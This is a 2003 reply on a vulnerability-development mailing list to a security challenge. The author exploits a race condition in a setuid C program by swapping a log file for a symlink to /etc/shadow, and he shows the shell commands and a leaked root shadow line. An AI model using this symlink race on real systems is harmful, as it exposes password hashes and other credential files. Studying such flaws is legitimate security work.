Vulnerability Development mailing list archives

Re: [Vuln-dev Challenge] Challenge #2


From: Thomas Cannon <tcannon () noops org>
Date: Fri, 23 May 2003 16:48:08 -0700


        /* read log */
        if ( (f1 = fopen("db.log", "r")) == NULL)
                return 1;
        if (fgets(bfp, BFSIZE, f1) == NULL)
                return 1;


...and if db.log is perhaps a symlink to /etc/shadow?

I assumed the program would be chown'd to root, and set 4755. If this is an
invalid assumption, well, no point in reading any further.

I compiled the program, stopped it after it wrote the input log, made a
symlink, and resumed running the program, with lovely results:

[tcannon@needle]$ rm db.log
[tcannon@needle]$ ln -s /etc/shadow db.log
[tcannon@needle]$ fg
./a.out a a
root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7:::

I like race conditions. No point in wasting your CPU -- that shadowed
password did get modified before I sent it to the list :-)

Cheers,

--tcannon

PS: Nice strcpy

